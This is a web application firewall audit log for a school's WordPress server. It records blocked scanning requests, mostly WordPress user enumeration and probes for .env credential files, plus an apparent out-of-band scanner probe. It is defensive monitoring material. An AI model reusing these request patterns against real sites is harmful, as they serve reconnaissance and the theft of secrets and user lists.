[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748702172120312 2819 (- - -) Stopwatch2: 1748702172120312 2819; combined=1203, p1=412, p2=761, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8185180a-Z-- --ebca4961-A-- [31/May/2025:22:34:32 +0700] aDshiOg1nD2n5twq7NvXWwAAAFU 103.236.140.4 51648 103.236.140.4 8181 --ebca4961-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.34.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.34.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ebca4961-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebca4961-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748705672455699 2938 (- - -) Stopwatch2: 1748705672455699 2938; combined=1258, p1=422, p2=808, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebca4961-Z-- --7c2be41a-A-- [31/May/2025:22:52:41 +0700] aDslyeg1nD2n5twq7NvcXQAAAEE 103.236.140.4 44754 103.236.140.4 8181 --7c2be41a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.70.177.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.70.177.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7c2be41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c2be41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748706761933440 3695 (- - -) Stopwatch2: 1748706761933440 3695; combined=2100, p1=669, p2=1396, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c2be41a-Z-- --950afd69-A-- [31/May/2025:23:07:35 +0700] aDspRx_L2Rte6DjSjWbOEAAAAI4 103.236.140.4 34900 103.236.140.4 8181 --950afd69-B-- POST /-/jira/login/oauth/access_token HTTP/1.0 Host: d0sp99jt8dtiqb665mogx478kcbaadb6r.oast.pro X-Real-IP: 27.110.165.147 X-Forwarded-Host: d0sp99jt8dtiqb665mogx478kcbaadb6r.oast.pro X-Forwarded-Server: d0sp99jt8dtiqb665mogx478kcbaadb6r.oast.pro X-Forwarded-For: 27.110.165.147 X-Forwarded-Proto: http Connection: close --950afd69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --950afd69-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||d0sp99jt8dtiqb665mogx478kcbaadb6r.oast.pro|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748707655613195 906 (- - -) Stopwatch2: 1748707655613195 906; combined=344, p1=310, p2=0, p3=0, p4=0, p5=34, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --950afd69-Z-- --42638424-A-- [31/May/2025:23:19:58 +0700] aDssLug1nD2n5twq7NvkhgAAAE0 103.236.140.4 48526 103.236.140.4 8181 --42638424-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.170.129.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.170.129.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --42638424-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42638424-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748708398671014 2543 (- - -) Stopwatch2: 1748708398671014 2543; combined=1465, p1=470, p2=922, p3=0, p4=0, p5=73, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42638424-Z-- --6d781158-A-- [31/May/2025:23:34:12 +0700] aDsvhB_L2Rte6DjSjWbUXwAAAIE 103.236.140.4 33790 103.236.140.4 8181 --6d781158-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.81.222.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.81.222.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6d781158-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d781158-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748709252495052 4299 (- - -) Stopwatch2: 1748709252495052 4299; combined=2188, p1=659, p2=1491, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d781158-Z-- --9d94ae4b-A-- [31/May/2025:23:47:09 +0700] aDsyjVbZTRMbIzLSWp5GIQAAAMQ 103.236.140.4 46172 103.236.140.4 8181 --9d94ae4b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.3 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept: */* Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache --9d94ae4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d94ae4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748710029210473 758 (- - -) Stopwatch2: 1748710029210473 758; combined=311, p1=271, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d94ae4b-Z-- --91870f34-A-- [31/May/2025:23:47:09 +0700] aDsyjVbZTRMbIzLSWp5GIwAAAMU 103.236.140.4 46186 103.236.140.4 8181 --91870f34-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.3 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept: */* Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache --91870f34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91870f34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748710029568911 769 (- - -) Stopwatch2: 1748710029568911 769; combined=283, p1=229, p2=0, p3=0, p4=0, p5=54, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91870f34-Z-- --b8169704-A-- [31/May/2025:23:47:09 +0700] aDsyjVbZTRMbIzLSWp5GJAAAAMA 103.236.140.4 46198 103.236.140.4 8181 --b8169704-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.3 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Accept: */* Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache --b8169704-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8169704-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748710029934891 791 (- - -) Stopwatch2: 1748710029934891 791; combined=320, p1=283, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8169704-Z-- --1c86e57d-A-- [01/Jun/2025:00:45:25 +0700] aDtANZ3Kgs4r2wz12c5aMwAAAAw 103.236.140.4 49424 103.236.140.4 8181 --1c86e57d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.234 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180) Accept-Charset: utf-8 --1c86e57d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c86e57d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748713525325440 876 (- - -) Stopwatch2: 1748713525325440 876; combined=385, p1=324, p2=0, p3=0, p4=0, p5=61, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c86e57d-Z-- --0f5bc615-A-- [01/Jun/2025:02:35:56 +0700] aDtaHOg1nD2n5twq7NsDSAAAAFQ 103.236.140.4 49826 103.236.140.4 8181 --0f5bc615-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0f5bc615-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f5bc615-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748720156962836 2831 (- - -) Stopwatch2: 1748720156962836 2831; combined=1316, p1=449, p2=838, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f5bc615-Z-- --9f3a7740-A-- [01/Jun/2025:02:35:59 +0700] aDtaH-g1nD2n5twq7NsDUQAAAFA 103.236.140.4 49848 103.236.140.4 8181 --9f3a7740-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9f3a7740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f3a7740-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748720159410565 2776 (- - -) Stopwatch2: 1748720159410565 2776; combined=1278, p1=423, p2=825, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f3a7740-Z-- --8cd61a39-A-- [01/Jun/2025:03:17:43 +0700] aDtj553Kgs4r2wz12c5uKgAAAAQ 103.236.140.4 55456 103.236.140.4 8181 --8cd61a39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.84 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8cd61a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cd61a39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748722663361245 2895 (- - -) Stopwatch2: 1748722663361245 2895; combined=1282, p1=421, p2=830, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cd61a39-Z-- --9a3eb902-A-- [01/Jun/2025:03:17:45 +0700] aDtj6Z3Kgs4r2wz12c5uLAAAABQ 103.236.140.4 55460 103.236.140.4 8181 --9a3eb902-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9a3eb902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a3eb902-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748722665785144 2628 (- - -) Stopwatch2: 1748722665785144 2628; combined=1199, p1=427, p2=742, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a3eb902-Z-- --de8f564f-A-- [01/Jun/2025:04:25:08 +0700] aDtztO4LjVe0Eerk_ZaHfgAAAEw 103.236.140.4 57142 103.236.140.4 8181 --de8f564f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.189.152.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.189.152.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de8f564f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8f564f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748726708988809 3165 (- - -) Stopwatch2: 1748726708988809 3165; combined=1397, p1=529, p2=838, p3=0, p4=0, p5=30, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8f564f-Z-- --d9d7ab0e-A-- [01/Jun/2025:04:28:11 +0700] aDt0awQ4kZQGAOBHoB5CRgAAANE 103.236.140.4 57158 103.236.140.4 8181 --d9d7ab0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 Accept-Charset: utf-8 --d9d7ab0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9d7ab0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748726891465836 994 (- - -) Stopwatch2: 1748726891465836 994; combined=420, p1=378, p2=0, p3=0, p4=0, p5=42, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9d7ab0e-Z-- --dfc69d21-A-- [01/Jun/2025:05:13:24 +0700] aDt_BEaTRmdfB-FaJjm5HQAAAA0 103.236.140.4 57474 103.236.140.4 8181 --dfc69d21-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 175.6.127.77 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 175.6.127.77 X-Forwarded-Proto: https Connection: close Content-Length: 73 User-Agent: python-httpx/0.27.0 accept: application/dns-message content-type: application/dns-message --dfc69d21-C-- ÂÞ 1d8720ea3e6b11f09d62fa163e75cb8f openresolverdnslabcn --dfc69d21-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfc69d21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748729604788640 3178 (- - -) Stopwatch2: 1748729604788640 3178; combined=2084, p1=444, p2=1565, p3=21, p4=23, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc69d21-Z-- --865e6122-A-- [01/Jun/2025:05:20:11 +0700] aDuAmwQHT18O7PnXxsQF9AAAAIk 103.236.140.4 57510 103.236.140.4 8181 --865e6122-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.249.78.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.249.78.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --865e6122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --865e6122-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748730011965691 3145 (- - -) Stopwatch2: 1748730011965691 3145; combined=1338, p1=456, p2=846, p3=0, p4=0, p5=36, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
